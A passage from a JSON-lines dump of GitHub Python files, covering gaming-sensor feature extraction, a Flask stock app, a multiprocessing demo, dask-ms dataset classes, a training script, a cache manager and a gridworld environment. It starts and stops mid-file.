pd.to_datetime(times_kills)]\n\n # time_start = 0\n # time_end = 5\n duration = 3\n time_start_end_list = [(0, duration), (-duration, 0), (-duration, duration)]\n\n sensors_list = ['acc_x', 'acc_y', 'acc_z', 'gyro_x', 'gyro_y', 'gyro_z']\n\n # for time_kills in times_kills:\n event_reactions_dict = {}\n\n for times_list, times_name in zip([times_is_killed, times_kills], ['times_is_killed', 'times_kills']):\n for time_start, time_end in time_start_end_list:\n name = f\"{times_name}_{time_start}_{time_end}\"\n std_list = []\n\n for time_event in times_list:\n timediff = schairlog['time'] - time_event\n mask = (time_start <= timediff) & (timediff < time_end)\n std = schairlog.loc[mask, sensors_list].std() # TODO: consider other sensors\n\n std_list.append(std)\n\n reaction_stats = pd.DataFrame(std_list).median() # It should be compared with mean std on the chair\n event_reactions_dict[name] = reaction_stats\n\n df_event_reactions = pd.DataFrame(event_reactions_dict) #.round(4).values\n\n features_dict = {}\n\n for sensor_name in 
df_event_reactions.index:\n for column in df_event_reactions.columns:\n feature_name = f\"{sensor_name}__{column}\"\n features_dict[feature_name] = df_event_reactions.loc[sensor_name, column]\n\n ### KDA-like objectives\n n_deaths = len(times_is_killed)\n n_kills = len(times_kills)\n\n n_deaths = max(n_deaths, 0.001) # bound\n\n kill_death_ratio = min(n_kills / n_deaths, 10)\n features_dict['Kill Death Ratio'] = kill_death_ratio\n # features_dict['kill_death_ratio'] = kill_death_ratio\n\n game_events_features_dict[session_id] = features_dict\n\n\n\ndf_game_events_features = pd.DataFrame(game_events_features_dict).T\ndf_game_events_features.reset_index(inplace=True)\ndf_game_events_features.rename(columns={'index': 'session_id'}, inplace=True)\ndf_game_events_features.to_csv('data/game_events_features.csv', index=False)\n\n\n\n\n\n# schairlog['acc_x'].std()\n#\n#\n# schairlog['time'] = pd.to_datetime(schairlog['time'])\n# schairlog_ = schairlog.set_index(['time'])\n#\n#\n# index_sample = schairlog_.index[5]\n#\n# schairlog_.loc[schairlog_.index < index_sample, :]\n#\n#\n# schairlog['time'].iloc[0]\n#\n# data_dict.keys()\n# gamedata_dict.keys()\n\n\n\n\n\n\n\n\n\n","repo_name":"smerdov/CS_GO_Sensors_Data_Analysis","sub_path":"ChairGamedataProcessing.py","file_name":"ChairGamedataProcessing.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"3695359909","text":"import argparse\n\nimport seb.operations as op\n\ndef construct_parser():\n parser = argparse.ArgumentParser(description='Collects SEB fund data')\n return parser\n\nif __name__ == \"__main__\":\n parser = construct_parser()\n args = parser.parse_args()\n\n op.load_settings()\n op.collect()\n","repo_name":"engelvinter/Xtrend","sub_path":"seb_collect.py","file_name":"seb_collect.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5789885275","text":"from flask import render_template, flash, redirect, url_for, request\nfrom app import app, db\nfrom app.forms import SearchForm\nfrom app.models import Stock\nimport xlrd \n\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n# path = \"data/svm_testing.xlsx\" #downPath承接上面下载文件的路径,这个读取文件路径都是可以换成自己的\n# workbook = xlrd.open_workbook(path) #打开excel文件\n\n# Data_sheet = workbook.sheets()[0] # 通过索引获取\n# rowNum = Data_sheet.nrows # sheet行数\n# colNum = Data_sheet.ncols # sheet列数\n \n\n# list = []\n \n# for i in range(rowNum):\n# rowlist = []\n# for j in range(colNum):\n# rowlist.append(Data_sheet.cell_value(i, j))\n# list.append(rowlist)\n \n# del list[0] #删掉第一行,第一行获取的是文件的头,一般不用插到数据库里面\n \n# # 接下来是把数据插到数据库里面,以下是我自己的数据库,大家可以根据自己的需要自行处理\n# print(Data_sheet.cell_value(1, 2))\n\n# for a in list: \n# stock = Stock()\n# stock.stockname= a[0]\n# stock.trend = a[1]\n# stock.accuracy = a[2]\n# stock.risk = a[3]\n# db.session.add(stock)\n# db.session.commit() \n\n\n\n page = request.args.get('page', 1, type=int)\n stocks = Stock.query.order_by(Stock.id).paginate(\n page, app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('index', page=stocks.next_num) \\\n if stocks.has_next else None\n prev_url = url_for('index', page=stocks.prev_num) \\\n if stocks.has_prev else None\n\n form = SearchForm()\n if form.validate_on_submit():\n stocks = Stock.query.filter_by(stockname=form.stockid.data).paginate(\n page, app.config['POSTS_PER_PAGE'], False)\n 
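# Rebuild the next/prev links from the filtered queryset so pagination follows
# the search results. Note that the bare `redirect(url_for('index'))` at the end
# of this branch is never returned, so it has no effect as written; presumably
# `return redirect(...)` was intended.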
next_url = url_for('index', page=stocks.next_num) \\\n if stocks.has_next else None\n prev_url = url_for('index', page=stocks.prev_num) \\\n if stocks.has_prev else None\n redirect(url_for('index'))\n \n \n return render_template('index.html', title = 'Home', stocks = stocks.items, form = form, next_url=next_url,\n prev_url=prev_url )\n\n \n@app.shell_context_processor\ndef make_shell_context():\n return {'db': db, 'Stock': Stock}","repo_name":"leoneong/stock_analytic","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20023643768","text":"import os\nimport pandas as pd\nimport numpy as np\nimport gc\nimport math\n\ndef reduce_memory_usage(df, features):\n for feature in features:\n item = df[feature].astype(np.float16)\n df[feature] = item\n del item\n gc.collect()\n\n\ndef reduce_memory_usage(df, features):\n for feature in features:\n item = df[feature].astype(np.float16)\n df[feature] = item\n del item\n gc.collect()\n\nn_features = 300\nfeatures = [str(i) for i in range(n_features)]\nfeature_columns = ['stock_id', 'time_id'] + features\ntrain = pd.read_csv('./train.csv')\nreduce_memory_usage(train, features + [\"label\"])\ntrain.to_pickle(\"train.pkl\")\n","repo_name":"jypeng28/Solution_Stock_Yield_Forecast","sub_path":"to_pickle.py","file_name":"to_pickle.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72771331752","text":"import math\n\ndef alphabetizeAttributeString(data):\n\tfor i in range(len(data)):\n\t\tnewDict = {}\n\t\tfor k,v in data[i].items():\n\t\t\tnewDict[''.join([c for c in k if c.isalpha() or c == ' '])] = v;\n\t\tdata[i] = newDict\n\ndef convertToNumber(data):\n\tfor ex in data:\n\t\tfor key in ex.keys():\n\t\t\ttry:\n\t\t\t\tex[key] = float(ex[key])\n\t\t\texcept ValueError:\n\t\t\t\tex[key] = ex[key]\n\ndef decapitalize(data):\n\tfor ex in data:\n\t\tfor key in ex.keys():\n\t\t\tif ex[key].isalpha(): ex[key] = ex[key].lower()\n\ndef processData(data):\n\talphabetizeAttributeString(data)\n\t#decapitalize names\n\tdecapitalize(data)\n\t#convert numeric attributes to numbers.\n\tconvertToNumber(data)\n\n\n\t\n","repo_name":"thomasyang1207/PredictFuture","sub_path":"Scripts/processData.py","file_name":"processData.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16310362205","text":"# -*- coding: utf-8 -*-\n\nfrom multiprocessing import Process\nfrom time import time,sleep\nimport os \n\n\n\"\"\"\nis_alive() # 判断进程是否还在执行\njoin() # 是否等待进程实例执行结束,或等待多少秒\nstart() # 启动进程实例(创建子进程) \nrun() # 如果没有给定target参数,对这个对象调用start()方法时,将执行对象中的run()方法\nterninate() # 不管任务是否完成,立即停止\nname # 当前进程实例名,默认从Process-1开始,一次递增\npid # 当前进程实例的pid值\n\"\"\"\n\n\n# 继承Process类\nclass SubProcess(Process):\n # 重写__init__方法\n def __init__(self,interval,name=\"\"):\n Process.__init__(self) #调用Process父类的初始化方法\n self.interval = interval # 接收参数interval\n if name: # 判断传递的参数name是否存在\n self.name = name \n \n # 重写Process类的run()方法\n def run(self):\n print(\"子进程(%s)开始执行,父进程为(%s)\"%(os.getpid(),os.getppid()))\n t_start= time()\n sleep(self.interval)\n t_end = time()\n print(\"子进程(%s)执行时间为%0.2f秒\"%(os.getpid(),t_end - t_start))\n \n \ndef main():\n print(\"主进程开始。。。。\")\n print(\"父进程PID:%s\"%os.getppid())\n p1 = SubProcess(interval=1,name=\"child_1\")\n p2 = 
SubProcess(interval=2,name=\"child_2\")\n p1.start()\n p2.start()\n\n print(\"p1.is_alive=%s\"%p1.is_alive())\n print(\"p1.is_alive=%s\"%p1.is_alive())\n\n print(\"p1.name=%s\"%p1.name)\n print(\"p1.pid=%s\"%p1.pid)\n print(\"p2.name=%s\"%p2.name)\n print(\"p2.pid=%s\"%p2.pid)\n print(\"等待子进程结束。。。。。\")\n p1.join()\n p2.join()\n print(\"主进程结束.....\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Raylively/python","sub_path":"多进程/process_class.py","file_name":"process_class.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74482294311","text":"# -*- coding: utf-8 -*-\n\ntry:\n from collections.abc import Mapping # python 3.8\nexcept ImportError:\n from collections import Mapping\n\nfrom collections import OrderedDict\n\nimport dask\nimport dask.array as da\nfrom dask.highlevelgraph import HighLevelGraph\nimport numpy as np\n\ntry:\n import xarray as xr\nexcept ImportError:\n xr = None\n\n\nclass DimensionInferenceError(ValueError):\n pass\n\n\nclass ChunkInferenceError(ValueError):\n pass\n\n\ndef data_var_dims(data_vars):\n \"\"\"Returns a {dim: size} dictionary constructed from `data_vars`\"\"\"\n dims = {}\n\n for k, var in data_vars.items():\n for d, s in zip(var.dims, var.shape):\n if d in dims and not np.isnan(s) and s != dims[d]:\n raise DimensionInferenceError(\n \"Existing dimension size %s for \"\n \"dimension '%s' is inconsistent \"\n \"with same dimension %s of \"\n \"array %s\" % (s, d, dims[d], k)\n )\n\n dims[d] = s\n\n return dims\n\n\ndef data_var_chunks(data_vars):\n \"\"\"Returns a {dim: chunks} dictionary constructed from `data_vars`\"\"\"\n chunks = {}\n\n for k, var in data_vars.items():\n if not isinstance(var.data, da.Array):\n continue\n\n for d, c in zip(var.dims, var.chunks):\n if d in chunks and c != chunks[d]:\n raise ChunkInferenceError(\n \"Existing chunking %s for \"\n \"dimension '%s' is inconsistent \"\n \"with chunking %s for the \"\n \"same dimension of array %s\" % (c, d, chunks[d], k)\n )\n\n chunks[d] = c\n\n return chunks\n\n\ndef as_variable(args):\n if not isinstance(args, tuple):\n raise TypeError(f\"args ({type(args)}) must be a tuple\")\n\n try:\n return Variable(*args)\n except TypeError as e:\n if \"takes at most\" in str(e):\n raise TypeError(\n \"Invalid number of arguments in Variable tuple. \"\n \"Must be a size 2 to 5 tuple of the form \"\n \"(dims, array[, attrs[, encoding[, fastpath]]]) \"\n )\n\n raise\n\n\ndef _convert_to_variable(k, v):\n \"\"\"Converts ``v`` to a :class:`daskms.dataset.Variable`\"\"\"\n if isinstance(v, Variable):\n return v\n\n if xr and isinstance(v, (xr.DataArray, xr.Variable)):\n return as_variable((v.dims, v.data, v.attrs))\n\n if not isinstance(v, (tuple, list)):\n raise ValueError(\n \"'%s' must be a size 2 to 5 tuple of the form\"\n \"(dims, array[, attrs[, encoding[, fastpath]]]) \"\n \"tuple. 
Got '%s' instead,\" % (k, type(v))\n )\n\n return as_variable(v)\n\n\nif xr is not None:\n from xarray import Dataset, Variable\nelse:\n # This class duplicates xarray's Frozen class in\n # https://github.com/pydata/xarray/blob/master/xarray/core/utils.py\n # See https://github.com/pydata/xarray/blob/master/LICENSE\n class Frozen(Mapping):\n \"\"\"\n Wrapper around an object implementing the Mapping interface\n to make it immutable.\n \"\"\"\n\n __slots__ = \"mapping\"\n\n def __init__(self, mapping):\n self.mapping = mapping\n\n def __getitem__(self, key):\n return self.mapping[key]\n\n def __iter__(self):\n return iter(self.mapping)\n\n def __len__(self):\n return len(self.mapping)\n\n def __contains__(self, key):\n return key in self.mapping\n\n def copy(self):\n return self.mapping.copy()\n\n def __repr__(self):\n return f\"{type(self).__name__}({self.mapping})\"\n\n class Variable:\n \"\"\"\n Replicates a minimal subset of `xarray Variable\n `_'s\n functionality.\n Exists to allows ``xarray`` to be an optional ``dask-ms`` dependency.\n \"\"\"\n\n def __init__(self, dims, data, attrs=None):\n \"\"\"\n Parameters\n ----------\n dims : str or tuple\n Dimension schema. e.g. :code:`('row', 'chan', 'corr')`\n data : :class:`numpy.ndarray` or :class:`dask.array.Array`\n Array\n attrs : dict or None\n Array metadata\n \"\"\"\n if not isinstance(dims, (tuple, list)):\n dims = (dims,)\n\n self.dims = dims\n self.data = data\n self.attrs = attrs or {}\n\n @property\n def dtype(self):\n \"\"\"Array data type\"\"\"\n return self.data.dtype\n\n @property\n def chunks(self):\n \"\"\"Array chunks if wrapping a dask array else None\"\"\"\n if isinstance(self.data, da.Array):\n return self.data.chunks\n\n return None\n\n @property\n def values(self):\n \"\"\"Returns actual array values\"\"\"\n if isinstance(self.data, da.Array):\n return self.data.compute()\n\n return self.data\n\n @property\n def shape(self):\n \"\"\"Array shape\"\"\"\n return self.data.shape\n\n @property\n def ndim(self):\n \"\"\"Number of array dimensions\"\"\"\n return self.data.ndim\n\n def __dask_keys__(self):\n return self.data.__dask_keys__()\n\n def __dask_graph__(self):\n if isinstance(self.data, da.Array):\n return self.data.__dask_graph__()\n\n return None\n\n def __dask_layers__(self):\n return self.data.__dask_layers__()\n\n @property\n def __dask_optimize__(self):\n return self.data.__dask_optimize__\n\n @property\n def __dask_scheduler__(self):\n return self.data.__dask_scheduler__\n\n @staticmethod\n def finalize_compute(results, fn, args, name, dims, attrs):\n return Variable(dims, fn(results, *args), attrs=attrs)\n\n def __dask_postcompute__(self):\n fn, args = self.data.__dask_postcompute__()\n\n name = self.data.name if isinstance(self.data, da.Array) else None\n args = (fn, args, name, self.dims, self.attrs)\n return (self.finalize_compute, args)\n\n @staticmethod\n def finalize_persist(results, fn, args, name, dims, attrs):\n results = {k: v for k, v in results.items() if k[0] == name}\n return Variable(dims, fn(results, *args), attrs=attrs)\n\n def __dask_postpersist__(self):\n fn, args = self.data.__dask_postpersist__()\n args = (fn, args, self.data.name, self.dims, self.attrs)\n return (self.finalize_persist, args)\n\n class Dataset:\n \"\"\"\n Replicates a minimal subset of `xarray Dataset\n `_'s\n functionality.\n Exists to allows ``xarray`` to be an optional ``dask-ms`` dependency.\n \"\"\"\n\n def __init__(self, data_vars, coords=None, attrs=None):\n \"\"\"\n Parameters\n ----------\n data_vars: dict\n 
Dictionary of variables of the form\n :code:`{name: (dims, array [, attrs])}`. `attrs` can\n be optional.\n coords : dict, optional\n Dictionary of coordinates of the form\n :code:`{name: (dims, array [, attrs])}`. `attrs` can\n be optional.\n attrs : dict, optional\n Dictionary of Dataset attributes\n \"\"\"\n self._data_vars = {\n k: _convert_to_variable(k, v) for k, v in data_vars.items()\n }\n\n if coords is not None:\n self._coords = {\n k: _convert_to_variable(k, v) for k, v in coords.items()\n }\n else:\n self._coords = {}\n\n self._attrs = attrs or {}\n\n @property\n def attrs(self):\n \"\"\"Dataset attributes\"\"\"\n return self._attrs\n\n @property\n def dims(self):\n \"\"\"A :code:`{dim: size}` dictionary\"\"\"\n return data_var_dims(self._data_vars)\n\n sizes = dims\n\n @property\n def chunks(self):\n \"\"\"A :code:`{dim: chunks}` dictionary\"\"\"\n return data_var_chunks(self._data_vars)\n\n @property\n def data_vars(self):\n \"\"\"Dataset variables\"\"\"\n return Frozen(self._data_vars)\n\n @property\n def coords(self):\n \"\"\"Dataset coordinates\"\"\"\n return Frozen(self._coords)\n\n def compute(self, **kwargs):\n \"\"\"\n Calls dask compute on the dask arrays in this Dataset,\n returning a new Dataset.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing computed arrays.\n \"\"\"\n\n # Compute dask arrays separately\n dask_data = {}\n data_vars = {}\n\n # Split variables into dask and other data\n for k, v in self._data_vars.items():\n if isinstance(v.data, da.Array):\n dask_data[k] = v\n else:\n data_vars[k] = v\n\n # Compute dask arrays if present and add them to data variables\n if len(dask_data) > 0:\n data_vars.update(da.compute(dask_data, **kwargs)[0])\n\n return Dataset(data_vars, coords=self._coords, attrs=self._attrs.copy())\n\n def assign(self, **kwargs):\n r\"\"\"\n Creates a new Dataset from existing variables combined with\n those supplied in \\*\\*kwargs.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing existing variables combined with\n those in \\*\\*kwargs.\n \"\"\"\n data_vars = self._data_vars.copy()\n data_vars.update(**kwargs)\n\n return Dataset(data_vars, attrs=self._attrs.copy(), coords=self._coords)\n\n def assign_coords(self, **kwargs):\n r\"\"\"\n Creates a new Dataset from existing attributes combined with\n those supplied in \\*\\*kwargs.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing existing attributes combined with\n those in \\*\\*kwargs.\n \"\"\"\n\n coords = {k: as_variable(v) for k, v in kwargs.items()}\n return Dataset(self._data_vars, attrs=self._attrs, coords=coords)\n\n def assign_attrs(self, **kwargs):\n r\"\"\"\n Creates a new Dataset from existing attributes combined with\n those supplied in \\*\\*kwargs.\n\n Returns\n -------\n :class:`~daskms.dataset.Dataset`\n Dataset containing existing attributes combined with\n those in \\*\\*kwargs.\n \"\"\"\n\n attrs = self._attrs.copy()\n attrs.update(kwargs)\n return Dataset(self._data_vars, attrs=attrs, coords=self._coords)\n\n @staticmethod\n def _drop_internal(mapping, names, errors=\"raise\"):\n if isinstance(names, (tuple, list, set)):\n names = set(names)\n else:\n names = set([names])\n\n if errors == \"raise\":\n mapping = mapping.copy()\n for n in names:\n try:\n del mapping[n]\n except KeyError:\n raise ValueError(f\"{n} does not exist on Dataset\")\n elif errors == \"ignore\":\n return {k: v for k, v in mapping.items() if k not in names}\n else:\n raise ValueError(f\"errors '{errors}' not in 
\" f\"('raise', 'ignore')\")\n\n def drop_vars(self, names, *, errors):\n \"\"\"Drop variables from the Dataset\n\n Parameters\n ----------\n names : str or iterable of str\n Variable names\n errors : {\"raise\", \"ignore\"}\n If \"raise\", a ValueError is raised if the\n specified variables are missing.\n If \"ignore\", the missing variables are ignored.\n\n Returns\n -------\n dataset : Dataset\n New dataset without the specified variables\n \"\"\"\n data_vars = self._drop_internal(self.data_vars, names, errors)\n coords = self._drop_internal(self.coords, names, errors)\n return Dataset(data_vars, coords=coords, attrs=self.attrs.copy())\n\n def __getitem__(self, name):\n try:\n return self._data_vars[name]\n except KeyError:\n pass\n\n try:\n return self._coords[name]\n except KeyError:\n pass\n\n try:\n return self._attrs[name]\n except KeyError:\n raise AttributeError(f\"Invalid item {name}\")\n\n def __getattr__(self, name):\n try:\n return self._data_vars[name]\n except KeyError:\n pass\n\n try:\n return self._coords[name]\n except KeyError:\n pass\n\n try:\n return self._attrs[name]\n except KeyError:\n raise AttributeError(f\"Invalid Attribute {name}\")\n\n def copy(self):\n \"\"\"Returns a copy of the Dataset\"\"\"\n return Dataset(\n self._data_vars, coords=self._coords, attrs=self._attrs.copy()\n )\n\n def __dask_graph__(self):\n graphs = {k: v.__dask_graph__() for k, v in self.data_vars.items()}\n # Excise anything that is not a dask collection\n graphs = {k: v for k, v in graphs.items() if v is not None}\n\n if len(graphs) > 0:\n return HighLevelGraph.merge(*graphs.values())\n\n return None\n\n def __dask_keys__(self):\n return [\n v.__dask_keys__()\n for v in self._data_vars.values()\n if dask.is_dask_collection(v)\n ]\n\n def __dask_layers__(self):\n return sum(\n [\n v.__dask_layers__()\n for v in self._data_vars.values()\n if dask.is_dask_collection(v)\n ],\n (),\n )\n\n @property\n def __dask_optimize__(self):\n return da.Array.__dask_optimize__\n\n @property\n def __dask_scheduler__(self):\n return da.Array.__dask_scheduler__\n\n @staticmethod\n def finalize_compute(results, info, coords, attrs):\n data_vars = OrderedDict()\n rev_results = list(results[::-1])\n\n for (dask_collection, k, v) in info:\n if dask_collection:\n fn, args = v\n r = rev_results.pop()\n data_vars[k] = fn(r, *args)\n else:\n data_vars[k] = v\n\n return Dataset(data_vars, coords=coords, attrs=attrs)\n\n def __dask_postcompute__(self):\n data_info = [\n (True, k, v.__dask_postcompute__())\n if dask.is_dask_collection(v)\n else (False, k, v)\n for k, v in self._data_vars.items()\n ]\n return self.finalize_compute, (data_info, self._coords, self._attrs)\n\n @staticmethod\n def finalize_persist(graph, info, coords, attrs):\n data_vars = OrderedDict()\n\n for dask_collection, k, v in info:\n if dask_collection:\n fn, args = v\n data_vars[k] = fn(graph, *args)\n else:\n data_vars[k] = v\n\n return Dataset(data_vars, coords=coords, attrs=attrs)\n\n def __dask_postpersist__(self):\n data_info = [\n (True, k, v.__dask_postpersist__())\n if dask.is_dask_collection(v)\n else (False, k, v)\n for k, v in self._data_vars.items()\n ]\n return self.finalize_persist, (data_info, self._coords, self._attrs)\n","repo_name":"ratt-ru/dask-ms","sub_path":"daskms/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":16378,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"6590154896","text":"import torch\nimport argparse\nimport datetime\nfrom 
setup_functions import *\nfrom configs.experiment_configs import *\n\n#default_experiment = 'default'\ndefault_experiment = 'c2'\nrun = 'run_2'\n\nparser = argparse.ArgumentParser(description='Contrastive Predictive Coding Training')\nparser.add_argument('--experiment', default=default_experiment, type=str)\nparser.add_argument('--name', default='classification_model_' + datetime.datetime.today().strftime('%Y-%m-%d') + '_' + run, type=str)\n\n\ndef main(experiment='default', name=None):\n dev = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n print(\"using device\", dev)\n\n settings = experiments[experiment]\n\n if name is not None:\n settings['snapshot_config']['name'] = name\n\n model, preprocessing_module = setup_classification_model(cqt_params=settings['cqt_config'],\n model_params=settings['model_config'])\n\n model, snapshot_manager, continue_training_at_step = setup_snapshot_manager(model=model,\n args_dict=settings['snapshot_config'],\n try_proceeding=True)\n\n trainer = setup_classification_trainer(model,\n snapshot_manager,\n preprocessing_module=preprocessing_module,\n dataset_args=settings['dataset_config'],\n trainer_args=settings['training_config'],\n dev=dev)\n\n print(\"training set length:\", len(trainer.dataset))\n print(\"validation set length:\", len(trainer.validation_set))\n\n try:\n trainer.logger.writer.add_text('configuration', experiment, 0)\n except:\n print(\"unable to write expriment to tensorboard\")\n\n trainer.train(batch_size=settings['training_config']['train_batch_size'],\n epochs=settings['training_config']['max_epochs'],\n lr=settings['training_config']['learning_rate'],\n num_workers=8,\n continue_training_at_step=continue_training_at_step)\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n main(args.experiment, args.name)\n","repo_name":"vincentherrmann/constrastive-predictive-coding-audio","sub_path":"classification_script.py","file_name":"classification_script.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25648611130","text":"import datetime\n\nfrom collections import namedtuple\nfrom datetime import timedelta\nfrom typing import Any, Optional\n\nfrom django.utils import timezone\n\nfrom haupt.common.options.option_owners import OptionOwners\n\n\nclass CachedOptionSpec(namedtuple(\"CachedOptionSpec\", \"value datetime\")):\n pass\n\n\nclass MemoryCacheManager:\n INVALIDED_OPTION = \"INVALIDED_OPTION\"\n\n def __init__(self):\n self._state = {}\n\n def clear_key(self, key: str, owners: Optional[OptionOwners] = None):\n if owners:\n key = f\"{key}:{owners}\"\n self._state.pop(key, None)\n\n def clear(self):\n self._state = {}\n\n @classmethod\n def is_valid_value(cls, value: Any):\n return value != cls.INVALIDED_OPTION\n\n @staticmethod\n def is_valid_cache(value_datetime: datetime.datetime) -> bool:\n return timezone.now() < value_datetime\n\n def get_from_cache(self, key: str, owners: Optional[OptionOwners] = None) -> Any:\n if owners:\n key = f\"{key}:{owners}\"\n cached_option = self._state.get(key)\n if cached_option and self.is_valid_cache(cached_option.datetime):\n return cached_option.value\n self.clear_key(key=key)\n return self.INVALIDED_OPTION\n\n def set_to_cache(\n self, key: str, value: Any, ttl: int, owners: Optional[OptionOwners] = None\n ):\n if ttl <= 0 or value is None:\n return\n if owners:\n key = f\"{key}:{owners}\"\n self._state[key] = CachedOptionSpec(\n value=value, datetime=timezone.now() + 
timedelta(seconds=ttl)\n )\n","repo_name":"polyaxon/haupt","sub_path":"haupt/haupt/common/memory_manager.py","file_name":"memory_manager.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":452,"dataset":"github-code","pt":"72"} +{"seq_id":"22170147915","text":"import sys\nfrom six import StringIO\nfrom gym import utils\nfrom gym.envs.toy_text import discrete\nimport numpy as np\n\nMAP = [\n\t\"╔═════════╗\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"║ · · · · ║\",\n\t\"╚═════════╝\",\n]\n\n\nclass GridworldEnv(discrete.DiscreteEnv):\n\t\"\"\"\n\tGridworld\n\t\n\tActions: \n\tThere are 4 discrete deterministic actions:\n\t- 0: move UP\n\t- 1: move DOWN\n\t- 2: move LEFT\n\t- 3: move RIGHT \n\t\n\tRewards: \n\tThere is a reward of -1 for each action.\n\t\n\tRendering:\n\t- yellow: agent\n\t- blue 'G': destination\n\t\"\"\"\n\tmetadata = {'render.modes': ['human', 'ansi']}\n\n\tdef __init__(self, model=None):\n\t\tself.desc = np.asarray(MAP,dtype='U')\n\n\t\tnS = 625\n\t\tnR = 5\n\t\tnC = 5\n\t\tmaxR = nR-1\n\t\tmaxC = nC-1\n\t\tisd = np.zeros(nS)\n\t\tnA = 4\n\t\tP = {s : {a : [] for a in range(nA)} for s in range(nS)}\n\n\t\tself.w_pr = np.zeros(5,dtype=np.float32) if model is None else model[0]\n\t\tself.w_pc = np.zeros(5,dtype=np.float32) if model is None else model[1]\n\t\tself.w_gr = np.zeros(5,dtype=np.float32) if model is None else model[2]\n\t\tself.w_gc = np.zeros(5,dtype=np.float32) if model is None else model[3]\n\n\t\tfor row in range(5):\n\t\t\tfor col in range(5):\n\t\t\t\tfor row_g in range(5):\n\t\t\t\t\tfor col_g in range(5):\n\t\t\t\t\t\tstate = self.encode(row, col, row_g, col_g)\n\t\t\t\t\t\t#if (row, col) != (row_g, col_g):\n\t\t\t\t\t\tprob = self.initialProb(row,col,row_g,col_g)\n\t\t\t\t\t\tisd[state] += prob\n\t\t\t\t\t\tfor a in range(nA):\n\t\t\t\t\t\t\t# defaults\n\t\t\t\t\t\t\tnewrow, newcol = row, col\n\t\t\t\t\t\t\treward = -1\n\t\t\t\t\t\t\tdone = False\n\n\t\t\t\t\t\t\tif a==0:\n\t\t\t\t\t\t\t\tnewrow = max(row-1, 0)\n\t\t\t\t\t\t\telif a==1:\n\t\t\t\t\t\t\t\tnewrow = min(row+1, maxR)\n\t\t\t\t\t\t\telif a==2:\n\t\t\t\t\t\t\t\tnewcol = max(col-1, 0)\n\t\t\t\t\t\t\telif a==3:\n\t\t\t\t\t\t\t\tnewcol = min(col+1, maxC)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif (newrow, newcol) == (row_g, col_g):\n\t\t\t\t\t\t\t\tdone = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tnewstate = self.encode(newrow, newcol, row_g, col_g)\n\t\t\t\t\t\t\tP[state][a].append((1.0, newstate, reward, done))\n\n\t\tdiscrete.DiscreteEnv.__init__(self, nS, nA, P, isd)\n\t\n\tdef initialProb(self, agentrow, agentcol, goalrow, goalcol):\n\t\tp_r = np.exp(self.w_pr[agentrow])/np.sum(np.exp(self.w_pr))\n\t\tp_c = np.exp(self.w_pc[agentcol])/np.sum(np.exp(self.w_pc))\n\t\tp_gr = np.exp(self.w_gr[goalrow])/np.sum(np.exp(self.w_gr))\n\t\tp_gc = np.exp(self.w_gc[goalcol])/np.sum(np.exp(self.w_gc))\n\t\treturn p_r * p_c * p_gr * p_gc\n\t\n\tdef dInitialProb_dw(self, agentrow, agentcol, goalrow, goalcol):\n\t\tdw_pr = -np.exp(self.w_pr)/np.sum(np.exp(self.w_pr))\n\t\tdw_pr[agentrow] += 1\n\t\tdw_pc = -np.exp(self.w_pc)/np.sum(np.exp(self.w_pc))\n\t\tdw_pc[agentcol] += 1\n\t\tdw_gr = -np.exp(self.w_gr)/np.sum(np.exp(self.w_gr))\n\t\tdw_gr[goalrow] += 1\n\t\tdw_gc = -np.exp(self.w_gc)/np.sum(np.exp(self.w_gc))\n\t\tdw_gc[goalcol] += 1\n\t\treturn np.ravel(np.array([dw_pr,dw_pc,dw_gr,dw_gc]))\n\n\tdef getInitialProbs(self):\n\t\tp_r = np.exp(self.w_pr)/np.sum(np.exp(self.w_pr))\n\t\tp_c = 
